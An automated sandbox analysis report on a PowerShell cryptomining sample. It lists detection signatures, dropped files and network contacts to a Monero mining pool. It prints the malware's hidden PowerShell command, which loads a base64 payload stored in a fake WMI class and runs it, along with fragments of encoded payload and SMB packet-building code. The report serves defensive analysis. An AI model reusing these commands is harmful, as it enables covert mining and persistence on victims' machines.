
ID: 43655 Sample Name: in3.ps1 Cookbook: default.jbs Time: 04:05:00 Date: 24/01/2018 Version: 20.0.0

Table of Contents

Analysis Report
  Overview
    General Information
    Detection
    Confidence
    Classification
    Analysis Advice
  Signature Overview
    AV Detection
    Networking
    Boot Survival
    Persistence and Installation Behavior
    Data Obfuscation
    Spreading
    System Summary
    HIPS / PFW / Operating System Protection Evasion
    Anti Debugging
    Malware Analysis System Evasion
    Hooking and other Techniques for Hiding and Protection
    Language, Device and Operating System Detection
  Behavior Graph
  Simulations
    Behavior and APIs
  Antivirus Detection
    Initial Sample
    Dropped Files
    Domains
  Yara Overview
    Initial Sample
    PCAP (Network Traffic)
    Dropped Files
    Memory Dumps
    Unpacked PEs
  Joe Sandbox View / Context
    IPs
    Domains
    ASN
    Dropped Files
  Screenshot
  Startup
  Created / dropped Files
  Contacted Domains/Contacted IPs
    Contacted Domains
    Contacted IPs
  Static File Info
    General
    File Icon
  Network Behavior
    Network Port Distribution
    TCP Packets
    UDP Packets
    DNS Queries
    DNS Answers
  Code Manipulations
  Statistics
  Behavior
    System Behavior
      Analysis Process: powershell.exe PID: 3084 Parent PID: 2836 (General; File Activities: File Created, File Deleted, File Written; Registry Activities: Key Value Created)
      Analysis Process: schtasks.exe PID: 3356 Parent PID: 3084 (General)
      Analysis Process: powercfg.exe PID: 3368 Parent PID: 3084 (General)
      Analysis Process: powercfg.exe PID: 3376 Parent PID: 3084 (General)
      Analysis Process: powercfg.exe PID: 3384 Parent PID: 3084 (General)
      Analysis Process: NETSTAT.EXE PID: 3392 Parent PID: 3084 (General; File Activities)
      Analysis Process: csc.exe PID: 3416 Parent PID: 3084 (General; File Activities)
      Analysis Process: cvtres.exe PID: 3424 Parent PID: 3416 (General; File Activities)
      Analysis Process: NETSTAT.EXE PID: 3440 Parent PID: 3084 (General; File Activities)
      Analysis Process: powershell.exe PID: 3464 Parent PID: 3084 (General; File Activities: File Created, File Deleted, File Written)
      Analysis Process: csc.exe PID: 3552 Parent PID: 3464 (General)
      Analysis Process: cvtres.exe PID: 3564 Parent PID: 3552 (General)
      Analysis Process: NETSTAT.EXE PID: 3596 Parent PID: 3084 (General)
  Disassembly
    Code Analysis

Copyright Joe Security LLC 2018 Page 2 of 26

Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 43655
Time: 04:05:00
Joe Sandbox Product: CloudBasic
Start date: 24.01.2018
Overall analysis duration: 0h 5m 57s
Hypervisor based Inspection enabled: false
Report: light
Sample file name: in3.ps1
Cookbook file name: default.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled
Detection: MAL
Classification: mal80.evad.troj.winPS1@25/21@1/1
HCA Information: Successful, ratio: 100%; Number of executed functions: 0; Number of non-executed functions: 0
EGA Information: Failed
HDC Information: Failed
Cookbook Comments: Found application associated with file extension: .ps1
Warnings:
• Exclude process from analysis (whitelisted): WmiPrvSE.exe, WmiApSrv.exe, conhost.exe, dllhost.exe
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, csc.exe, powershell.exe, csc.exe

Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 80 | 0 - 100 | Report FP / FN | 

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false | 

Classification

[Classification chart (image in the original): axes Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware; scale malicious / suspicious / clean.]

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Signature Overview

• AV Detection
• Networking
• Boot Survival
• Persistence and Installation Behavior
• Data Obfuscation
• Spreading
• System Summary
• HIPS / PFW / Operating System Protection Evasion
• Anti Debugging
• Malware Analysis System Evasion
• Hooking and other Techniques for Hiding and Protection
• Language, Device and Operating System Detection

AV Detection:

Antivirus detection for submitted file

Networking:

Performs DNS lookups

Detected TCP or UDP traffic on non-standard ports

Uses netstat to query active network connections and open ports

Boot Survival:

Uses schtasks.exe or .exe to add and modify task schedules

Persistence and Installation Behavior:

Drops PE files

Data Obfuscation:

Compiles C# or VB.Net code

Suspicious powershell command line found

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Enumerates the file system

System Summary:

Uses Microsoft Silverlight

Submission file is bigger than most known malware samples

Uses new MSVCR Dlls

Binary contains paths to symbols

Classification

Creates files inside the user directory

Creates temporary files

Found command line output

Parts of this application are using the .NET runtime (Probably coded in C#)

Queries process information (via WMI, Win32_Process)

Reads ini files

Reads software policies

Sample is known by Antivirus (Virustotal or Metascan)

Spawns processes

Uses an in-process (OLE) Automation server

Creates mutexes

PE file does not import any functions

Reads the hosts file

Powershell connects to network

Uses powercfg.exe to modify the power settings

HIPS / PFW / Operating System Protection Evasion:

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Enables debug privileges

Malware Analysis System Evasion:

Queries a list of all running processes

Enumerates the file system

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)

System process connects to network (likely due to code injection or exploit)

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Behavior Graph

[Behavior graph rendered as an image in the original. Header: ID: 43655; Sample: in3.ps1; Startdate: 24/01/2018; Architecture: WINDOWS; Score: 80. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious. Nodes and edges recoverable from the graph text:]

powershell.exe (root; 1 created registry value, 12 created files)
    signatures: Antivirus detection for submitted file; Detected TCP or UDP traffic on non-standard ports; Suspicious powershell command line found; 3 other signatures
    started: powershell.exe, NETSTAT.EXE, csc.exe, 6 other processes
    dropped: unknown (ASCII); C:\Users\user\AppData\Local\...\rjax4qnu.dll (PE32)

powershell.exe (child)
    signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Suspicious powershell command line found; System process connects to network (likely due to code injection or exploit); Powershell connects to network; Detected TCP or UDP traffic on non-standard ports
    DNS/IP: xmr-eu1.nanopool.org, 5.196.23.240, port 14444 (local port 49165), OVHFR, France, Is malicious
    started: csc.exe
        dropped: C:\Users\user\AppData\Local\...\oyswbnum.dll (PE32)
        started: cvtres.exe

csc.exe (started by the root powershell.exe)
    started: cvtres.exe

Simulations

Behavior and APIs

Time | Type | Description
04:05:17 | API Interceptor | 187x Sleep call for process: powershell.exe modified from: 60000ms to: 100ms

Antivirus Detection

Initial Sample

Source | Detection | Cloud Link
in3.ps1 | 25% | virustotal

Dropped Files

No Antivirus matches

Domains

Source | Detection | Cloud Link
xmr-eu1.nanopool.org | 0% | virustotal

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshot

Startup

System is w7

• powershell.exe (PID: 3084, cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\in3.ps1', MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • schtasks.exe (PID: 3356, cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f, MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • powercfg.exe (PID: 3368, cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0, MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F)
    • powercfg.exe (PID: 3376, cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0, MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F)
    • powercfg.exe (PID: 3384, cmdline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000, MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F)
    • NETSTAT.EXE (PID: 3392, cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp, MD5: 32297BB17E6EC700D0FC869F9ACAF561)
    • csc.exe (PID: 3416, cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline', MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)
        • cvtres.exe (PID: 3424, cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES27A9.tmp' 'c:\Users\user\AppData\Local\Temp\CSC278A.tmp', MD5: 200FC355F85ECD4DB77FB3CAB2D01364)
    • NETSTAT.EXE (PID: 3440, cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp, MD5: 32297BB17E6EC700D0FC869F9ACAF561)
    • powershell.exe (PID: 3464, cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:Office_Updater' ).Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')', MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • csc.exe (PID: 3552, cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline', MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)
            • cvtres.exe (PID: 3564, cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES760E.tmp' 'c:\Users\user\AppData\Local\Temp\CSC75BC.tmp', MD5: 200FC355F85ECD4DB77FB3CAB2D01364)
    • NETSTAT.EXE (PID: 3596, cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp, MD5: 32297BB17E6EC700D0FC869F9ACAF561)

Created / dropped Files

C:\Users\HERBBL~1\AppData\Local\Temp\RES27A9.tmp; File Type: data; Size (bytes): 2064; Entropy (8bit): 2.423613257714554; Encrypted: false; MD5: 927D038C64CEA66482AFA677C82DAF51; SHA1: 9A32E620E8D6304DE70B0936567C9E7F2D713A8F; SHA-256: 4FAA5DDFB32BE482108B1D2A79C26C07C470F4D2DEF23B5A197067A52E3E0A0E; SHA-512: 8F0E13F4C8BC63B44CA869E65577B89BA137F4D56BF1C11F086D6ED3E2E6678692AD1E47767D72EAECACFF575488BE5E51FFF339A03F7EB4CDAAB1E6D03F39B1; Malicious: false; Reputation: low

C:\Users\HERBBL~1\AppData\Local\Temp\RES760E.tmp; File Type: data; Size (bytes): 2064; Entropy (8bit): 2.4141749278482907; Encrypted: false; MD5: 7A474218BD4F476ED92D26B126EBDCF0; SHA1: 98DE35CBBC45CDF8AFC6A165DFD671D2CCD42A60; SHA-256: 06065CDA30F91AD2C0CA5F5BD71063C8420146D9D7FCCD47390688AF729950C4; SHA-512: CB865F0895316C88F7836F2E804E6ED86C8092F264C093B5DCC39C8844160AC9DCE8A012DEFFA035A81D03A11EB4D893200BEC5C9DD0989F992E32547C649912; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\CSC278A.tmp; File Type: MSVC .res; Size (bytes): 652; Entropy (8bit): 3.1032118609720056; Encrypted: false; MD5: 1DC6466168ABDB9110FCDD83DADD6F50; SHA1: 26C992C087A55E3D47259F9B0893AA8762AD4777; SHA-256: 81F6C716656DCA362067B213EA0E8317240F2A7DCD2679BBEF6D369BC43043F3; SHA-512: B70A9E277408F8B322DDC1D357E797A20DF68734FFBDC0B703E386D5AB5E80E4EE66A728DA02CA4CBBFA0378E7EAFEF5147E0D063771B0094706EBE8D446E891; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\CSC75BC.tmp; File Type: MSVC .res; Size (bytes): 652; Entropy (8bit): 3.0922747231331877; Encrypted: false; MD5: 68F8D1329C0DA5ACC9E8346D75091E03; SHA1: C65101453DE9A7299DE3F4414776EFAFEBDA6CC6; SHA-256: 6C90A8C7F20E8DDE07C5B892F0C61B232C384480C43B5628EEA474A9BE402487; SHA-512: 456261F6673E7313497C358C4ABFA1378262C54D7B91A39565EFE83942124BD5DD0C57566B1A4F087553488C46930D86D88CCDC8411350882F673D3E2A89B5BC; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs; File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators; Size (bytes): 5826; Entropy (8bit): 4.9118391565359545; Encrypted: false; MD5: BE45C5DB7A9A66F35401E2B00BBDB856; SHA1: 354DC7D3F4D6F80359B0BA99081C0B6705F49480; SHA-256: 1CEEFFDD10ECE58A1B0F298BF4BD2CA65E1EF5CD50248F89F89870E21C7E5E3B; SHA-512: A33F9D0FCA8ED8513CB9F16155C124C3259C56D7C8B90B6376095672288852B275B2ECA7006D7CB1A45A5EBE600075D459DFF71C21C181B26D0E66034AB0DF4F; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline; File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators; Size (bytes): 327; Entropy (8bit): 5.27318065753439; Encrypted: false; MD5: EA4DA1BF55F3671A53FF6F74EDF4C9A8; SHA1: E368BEC9625DD399BBD9D06E9677817FE20EA689; SHA-256: A72635BD6630F9F5837B67FD30EE0EC820EC64C10DD16E1C77B66B26FE4F424C; SHA-512: E26A35C1B70F0B816A415C40A3582E65BE28AFDB6CA765C7049FCC3674FFC8AAE854D44146E14465AC818AD67DE8F88F0152A04A44738CBD2E1751FACDB47A9C; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\oyswbnum.dll; File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows; Size (bytes): 6656; Entropy (8bit): 4.218026044231743; Encrypted: false; MD5: 6A0F2C890C628D0803C0B96F50C80ED9; SHA1: 0F562FB8C8A03B81C9EB93152273A1228AC460C0; SHA-256: 4F4ACA1FF2861E962A710E6FFBB585F7103D823FCF96C79E1A0073542103D889; SHA-512: 9E770DFEE67FD219C42D12E32A2FDAC42EABA80FD5F3F3546DBAEF54BE2E2703A29037B17F025BEEB1FD0064881BC1184F61AC13A8D2E64E50F489AE655DD188; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\oyswbnum.out; File Type: ASCII text, with CRLF line terminators; Size (bytes): 198; Entropy (8bit): 4.894444435447009; Encrypted: false; MD5: 182738883BFDFB548627BEC18305C7EE; SHA1: FD5A8D41B96844985C0DC21116CFA689CED8AABE; SHA-256: 5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622; SHA-512: 9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D73628FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\oyswbnum.pdb; File Type: data; Size (bytes): 25005; Entropy (8bit): 1.6142161546330653; Encrypted: false; MD5: 664854096D1C6D77F067F8465395AC25; SHA1: D9426E4795BC8E95C0387A95CA5C61B1E734B866; SHA-256: B58FC894BBF40120563E257C1CF872AA019683D7A08809C8C12EFCCAD090F991; SHA-512: 884A5E0265840134C8D0A960A7DE0F4FF7F736A1D52B5B3F513854637D106559E2DF2D8828A76C2F91DCFEA7D205CCE13BAA9EDAE2E4A054A80C067F1A0BB0A5; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs; File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators; Size (bytes): 5826; Entropy (8bit): 4.9118391565359545; Encrypted: false; MD5: BE45C5DB7A9A66F35401E2B00BBDB856; SHA1: 354DC7D3F4D6F80359B0BA99081C0B6705F49480; SHA-256: 1CEEFFDD10ECE58A1B0F298BF4BD2CA65E1EF5CD50248F89F89870E21C7E5E3B; SHA-512: A33F9D0FCA8ED8513CB9F16155C124C3259C56D7C8B90B6376095672288852B275B2ECA7006D7CB1A45A5EBE600075D459DFF71C21C181B26D0E66034AB0DF4F; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline; File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators; Size (bytes): 327; Entropy (8bit): 5.337652007275668; Encrypted: false; MD5: FBBECDED4237D6D968AB6F63D4ED1AF8; SHA1: 0E51A762F7C860A0A2DDD291FA933F4F3197F3AA; SHA-256: D3CA342B07621A1683692977DC64355F09099E8EDD5811704FF488B3B8B4ACA0; SHA-512: 5F10C8B6669E2108C6852A23B0D5EF4FC379E1264C058139B7D8F26F519AD6E5399BDA052D9B7FEF0F5EA1980471AB5907CDCC3FB06C7B9262880DF9C4D1A4EC; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\rjax4qnu.dll; File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows; Size (bytes): 6656; Entropy (8bit): 4.225769101851168; Encrypted: false; MD5: 3B28DD0B534D180BBA0AC5BDA4752105; SHA1: E143343B330B7BC88290D20E95A0CED1346BD2BB; SHA-256: 8B5276B2F47F565E02494E9E19C36E35809189D0F3D908CF6DD69B1711D8BAB9; SHA-512: CAF5CF31DBCE06D4BD09AD849FC70348931E6A7D68960D2C018988A8A7CA76DBCAF91074453C08A0B3E5E73E85E0D65385453A5833AFA91EFD4E38C11D1CBD84; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\rjax4qnu.out; File Type: ASCII text, with CRLF line terminators; Size (bytes): 198; Entropy (8bit): 4.894444435447009; Encrypted: false; MD5: 182738883BFDFB548627BEC18305C7EE; SHA1: FD5A8D41B96844985C0DC21116CFA689CED8AABE; SHA-256: 5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622; SHA-512: 9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D73628FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0; Malicious: false; Reputation: low

C:\Users\user\AppData\Local\Temp\rjax4qnu.pdb; File Type: data; Size (bytes): 25005; Entropy (8bit): 1.6174196680285136; Encrypted: false; MD5: C358AFBC3D4424EA00140A14E00C9B3F; SHA1: EF19D4610988F8CC7A0FB575BAA1AA57CE92C5E5; SHA-256: 7E991ABE150A9333811A870D5A348D64EEF2C7FFC77FA778BC22D4F691409EF2; SHA-512: FE71EA77CE35DC7F690FDC4207B50A498F5C58CA59D5E8630C3B6D22A1C2C5AC0C7E50F97A180EA2D3B055E9C4B49E62B696DCF91DB990D737B9F0E0012E42C1; Malicious: false; Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64QXU9TVGGU3OQHE5F7D.temp; File Type: data; Size (bytes): 8016; Entropy (8bit): 3.5764246316706374; Encrypted: false; MD5: B849D88D6662229F28EC2F011BCEBDDC; SHA1: 09B8F87CCA07102998468AA8BEB79947DF1F26F7; SHA-256: AE67A28CC5DE7F765D4A55011A662C92B67AC87E3349F3B843932EB676ECE128; SHA-512: 0043CF3C7DB5E186A0B5D770854B76B3CC8797104024D2EB976598167D49A4A852088B5D11C95376ACFA0C560AEF9117EBA0D79416AA516EA19BA7714A0B5211; Malicious: false; Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DEAK7SA58B6AXIB1VI01.temp; File Type: data; Size (bytes): 8016; Entropy (8bit): 3.5764246316706374; Encrypted: false; MD5: B849D88D6662229F28EC2F011BCEBDDC; SHA1: 09B8F87CCA07102998468AA8BEB79947DF1F26F7; SHA-256: AE67A28CC5DE7F765D4A55011A662C92B67AC87E3349F3B843932EB676ECE128; SHA-512: 0043CF3C7DB5E186A0B5D770854B76B3CC8797104024D2EB976598167D49A4A852088B5D11C95376ACFA0C560AEF9117EBA0D79416AA516EA19BA7714A0B5211; Malicious: false; Reputation: low

unknown; File Type: ASCII text, with CRLF line terminators; Size (bytes): 778; Entropy (8bit): 3.4756022370268416; Encrypted: false; MD5: 10C68DB33AE59065AA87C180AE7DFEAB; SHA1: 36F6BAF7E0274B0EEDB98D58C1492383FC5840B4; SHA-256: F069614379B512142D132CAD14FD4C63EB225056C2E3E1633104DE429F4DC224; SHA-512: BA41E52D5C18B6B5CBD0A2438C49024BF15E7E1054A0E2805DE074AFEF283CD4C86E8E12340A23B3BAC4C017439AD993AA4679789FEB743C2D9C75F9D7B0CDF1; Malicious: true; Reputation: low

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection
xmr-eu1.nanopool.org | 5.196.23.240 | true | true | 0% (virustotal)

Contacted IPs

IP | Country | ASN | ASN Name | Malicious
5.196.23.240 | France | 16276 | OVHFR | true

Static File Info

General

File type: ASCII text, with very long lines, with no line terminators
Entropy (8bit): 5.648116609140601
TrID: 
File name: in3.ps1
File size: 3766940
MD5: 9d2c27a1a6e18b0b815c938e05c03e7b
SHA1: 4ef882b05566dc706fbc604b1bf771e8c7dab86a
SHA256: f6e75f0346425209c92217da882fca45d7004e683c8122a48a7b3bcec5356e1d
SHA512: d9b56bc6f495ff0bc417c79e1a69268ebaeac4a9e034b6a0490024eb90f669f3f065dde251feeca1d71d9d021176e976bdd7eb4021b886d4494d76884a34d25c
File Content Preview: $fa='SLTAH+6B8AAAA5+HXvWItYJEwB+2aLDEuLWBxMAfuLBItMAfheWVvDUjHAmazByg0BwoXAdfaSWsNVU1dWQVdJiyhMi30IUl5MicsxwEQPIsBIiQKJwUj30UmJwLBAUMHgBlBJiQFIg+wgv+qZblfoZf///0iDxDCFwHVFSIs+SI01TQAAALkABgAA86RIi0XwSItAGEiLQCBIiwBmg3hIGHX2SItQUIF6DDMAMgB16UyLeCC/XlFeg+gi

File Icon

Network Behavior

Network Port Distribution

Total Packets: 6 • 14444 undefined • 53 (DNS)

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 24, 2018 04:07:21.389946938 CET | 63266 | 53 | 192.168.2.2 | 8.8.8.8
Jan 24, 2018 04:07:21.815835953 CET | 53 | 63266 | 8.8.8.8 | 192.168.2.2
Jan 24, 2018 04:07:21.896513939 CET | 49165 | 14444 | 192.168.2.2 | 5.196.23.240
Jan 24, 2018 04:07:21.896553040 CET | 14444 | 49165 | 5.196.23.240 | 192.168.2.2
Jan 24, 2018 04:07:21.896683931 CET | 49165 | 14444 | 192.168.2.2 | 5.196.23.240
Jan 24, 2018 04:07:21.899632931 CET | 49165 | 14444 | 192.168.2.2 | 5.196.23.240
Jan 24, 2018 04:07:21.899658918 CET | 14444 | 49165 | 5.196.23.240 | 192.168.2.2
Jan 24, 2018 04:07:41.785490036 CET | 14444 | 49165 | 5.196.23.240 | 192.168.2.2
Jan 24, 2018 04:07:41.984119892 CET | 14444 | 49165 | 5.196.23.240 | 192.168.2.2
Jan 24, 2018 04:07:41.984252930 CET | 49165 | 14444 | 192.168.2.2 | 5.196.23.240

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 24, 2018 04:07:21.389946938 CET | 63266 | 53 | 192.168.2.2 | 8.8.8.8
Jan 24, 2018 04:07:21.815835953 CET | 53 | 63266 | 8.8.8.8 | 192.168.2.2

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 24, 2018 04:07:21.389946938 CET | 192.168.2.2 | 8.8.8.8 | 0xd87d | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 24, 2018 04:07:21.815835953 CET | 8.8.8.8 | 192.168.2.2 | 0xd87d | No error (0) | xmr-eu1.nanopool.org | | 5.196.23.240 | A (IP address) | IN (0x0001)

Code Manipulations

Statistics

Behavior

• powershell.exe • schtasks.exe • powercfg.exe • powercfg.exe • powercfg.exe • NETSTAT.EXE • csc.exe • cvtres.exe • NETSTAT.EXE • powershell.exe • csc.exe • cvtres.exe • NETSTAT.EXE


System Behavior

Analysis Process: powershell.exe PID: 3084 Parent PID: 2836

General

Start time: 04:05:14 Start date: 24/01/2018 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\in3.ps1' Imagebase: 0x755c0000 File size: 452608 bytes MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA Programmed in: .Net C# or VB.NET Reputation: low

File Activities

File Created

File Path | Access | Attributes | Options | Completion | Count | Address | Symbol
C:\Users\user\AppData\Local\Temp\rjax4qnu.tmp | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW
C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW
C:\Users\user\AppData\Local\Temp\rjax4qnu.dll | read attributes and synchronize and generic read and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW
C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW
C:\Users\user\AppData\Local\Temp\rjax4qnu.out | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW
C:\Users\user\AppData\Local\Temp\rjax4qnu.err | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 1A1072F | CreateFileW

File Deleted

File Path | Completion | Count | Address | Symbol
C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline | success or wait | 1 | 1A101D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\rjax4qnu.dll | success or wait | 1 | 1A101D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\rjax4qnu.tmp | success or wait | 1 | 1A101D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\rjax4qnu.pdb | success or wait | 1 | 1A101D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\rjax4qnu.err | success or wait | 1 | 1A101D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs | success or wait | 1 | 1A101D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\rjax4qnu.out | success or wait | 1 | 1A101D2 | DeleteFileW

File Written

File Path | Offset | Length | Ascii (written bytes decoded, as far as the report shows them) | Completion | Count | Address | Symbol

C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs | unknown | 4096 | UTF-8 BOM, then: | success or wait | 1 | 1A108E7 | WriteFile
    using System;
    using System.Collections.Generic;
    using System.Diagnostics;
    using System.IO;
    using System.Net;
    using System.Net.Sockets;
    using System.Text;

    namespace PingCastle.Scanners
    {
        public class m17sc
        {
            static public bool Scan(stri

C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs | unknown | 1730 | continuation of the source: | success or wait | 1 | 1A108E7 | WriteFile
    der = new BinaryReader(ms);
            byte[] part1 = new byte[] {
                0x00,0x00,0x00,0x00,
                0xff,0x53,0x4d,0x42,
                0x75,
                0x00,
                0x00,
                0x00,0x00,
                0x18,
                0x01,0x28,
                0x00,0x00,
                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x

C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline | unknown | 327 | UTF-8 BOM, then: | success or wait | 1 | 1A108E7 | WriteFile
    /t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:"C:\Users\user\AppData\Local\Temp\rjax4qnu.dll" /D:DEBUG /debug+ /optimize-

C:\Users\user\AppData\Local\Temp\rjax4qnu.out | unknown | 422 | UTF-8 BOM, then: | success or wait | 1 | 1A108E7 | WriteFile
